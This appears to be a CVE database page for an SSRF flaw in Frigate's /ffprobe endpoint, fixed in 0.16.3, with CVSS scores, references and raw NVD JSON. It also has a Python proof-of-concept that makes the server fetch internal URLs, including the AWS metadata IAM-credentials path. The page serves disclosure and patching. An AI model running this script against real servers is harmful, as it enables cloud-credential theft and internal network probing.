CVE-2026-33126

Description

Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to version 0.16.3, the /ffprobe endpoint accepts arbitrary user-controlled URLs without proper validation, allowing Server-Side Request Forgery (SSRF) attacks. An attacker can use the Frigate server to make HTTP requests to internal network resources, cloud metadata services, or perform port scanning. This issue has been patched in version 0.16.3.

CVSS Details

CVSS Score

5.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:* - VULNERABLE

Frigate < 0.16.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_ssrf(target_url, internal_url):
    """
    Proof of Concept for CVE-2026-33126
    Tests if the target Frigate server is vulnerable to SSRF via /ffprobe endpoint.
    """
    # The vulnerable endpoint
    endpoint = f"{target_url.rstrip('/')}/ffprobe"
    
    # Payload containing the internal URL to access
    # Example: AWS Metadata service or an internal admin panel
    payload = {
        "url": internal_url
    }

    try:
        print(f"[*] Sending request to {endpoint} with payload: {internal_url}")
        response = requests.post(endpoint, data=payload, timeout=10)
        
        print(f"[+] Status Code: {response.status_code}")
        print("[+] Response Content:")
        print(response.text)
        
        if response.status_code == 200 and "169.254" in response.text:
            print("[!] Potential SSRF vulnerability confirmed: Metadata service accessed.")
        elif response.status_code == 200:
            print("[!] Request processed, check output for internal data.")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target Frigate server URL
    target = "http://localhost:5000"
    
    # Common internal targets to test
    test_urls = [
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/", # AWS Metadata
        "http://127.0.0.1:80", # Localhost
        "http://192.168.1.1"   # Router/Gateway
    ]
    
    for url in test_urls:
        check_ssrf(target, url)
        print("-" * 40)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33126
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33126
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33126/
[4] VulDB https://vuldb.com/cve/CVE-2026-33126
[5] https://github.com/blakeblackshear/frigate/releases/tag/v0.16.3
[6] https://github.com/blakeblackshear/frigate/security/advisories/GHSA-j6g3-3j3q-c2xv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33126", "sourceIdentifier": "[email protected]", "published": "2026-03-20T20:16:48.597", "lastModified": "2026-03-23T19:17:05.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to version 0.16.3, the /ffprobe endpoint accepts arbitrary user-controlled URLs without proper validation, allowing Server-Side Request Forgery (SSRF) attacks. An attacker can use the Frigate server to make HTTP requests to internal network resources, cloud metadata services, or perform port scanning. This issue has been patched in version 0.16.3."}, {"lang": "es", "value": "Frigate es un grabador de vídeo en red (NVR) con detección de objetos local en tiempo real para cámaras IP. Antes de la versión 0.16.3, el endpoint /ffprobe acepta URLs arbitrarias controladas por el usuario sin la validación adecuada, permitiendo ataques de falsificación de petición del lado del servidor (SSRF). Un atacante puede usar el servidor Frigate para realizar peticiones HTTP a recursos de red internos, servicios de metadatos en la nube o realizar escaneo de puertos. Este problema ha sido parcheado en la versión 0.16.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.16.3", "matchCriteriaId": "4B744C6E-3CD3-4E1B-86E8-4159D6364293"}]}]}], "references": [{"url": "https://github.com/blakeblackshear/frigate/releases/tag/v0.16.3", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/blakeblackshear/frigate/security/advisories/GHSA-j6g3-3j3q-c2xv", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}